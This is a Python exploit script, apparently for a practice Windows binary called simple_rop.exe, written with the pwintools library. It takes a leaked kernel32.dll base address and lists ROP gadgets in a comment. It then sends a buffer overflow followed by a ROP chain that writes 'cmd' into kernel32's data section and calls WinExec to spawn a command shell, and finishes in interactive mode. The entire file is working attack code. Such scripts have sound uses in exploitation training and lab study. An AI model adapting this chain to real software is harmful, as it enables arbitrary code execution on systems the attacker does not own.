from pwintools import *

p = Process("./x64/Release/simple_rop.exe")
#p.spawn_debugger(x96dbg=True, sleep=2)

k32_base = int(p.recvline(False).split()[-1], 16)
log.info("kernel32.dll @ 0x{:016x}".format(k32_base))

k32_data_ofs = 0xA7000
WinExec_ofs = p.symbols['kernel32.dll']['WinExec'] - p.libs['kernel32.dll']
Sleep_ofs = p.symbols['kernel32.dll']['Sleep'] - p.libs['kernel32.dll']

"""
dll base 0x0000000180000000
0x000000018001adf3 : pop rcx ; ret
0x0000000180016e92 : pop rdx ; cmc ; add eax, 0x81108b00 ; ret 0
0x00000001800169da : mov qword ptr [rdx], rcx ; ret
"""

def w(addr, dat):
    payload  = p64(k32_base + 0x0000000180016e92 - 0x0000000180000000) + p64(addr)
    payload += p64(k32_base + 0x000000018001adf3 - 0x0000000180000000) + p64(dat)
    payload += p64(k32_base + 0x00000001800169da - 0x0000000180000000)
    return payload

payload  = "A"*0x18
payload += w(k32_base + k32_data_ofs, u64("cmd\0\0\0\0\0"))
payload += p64(k32_base + 0x000000018001adf3 - 0x0000000180000000) + p64(k32_base + k32_data_ofs)
payload += p64(k32_base + 0x0000000180016e92 - 0x0000000180000000) + p64(10)
payload += p64(k32_base + WinExec_ofs)
payload += p64(k32_base + 0xBA90)  # jmp $

p.send(payload)

log.info('Starting interactive mode ...')
p.interactive()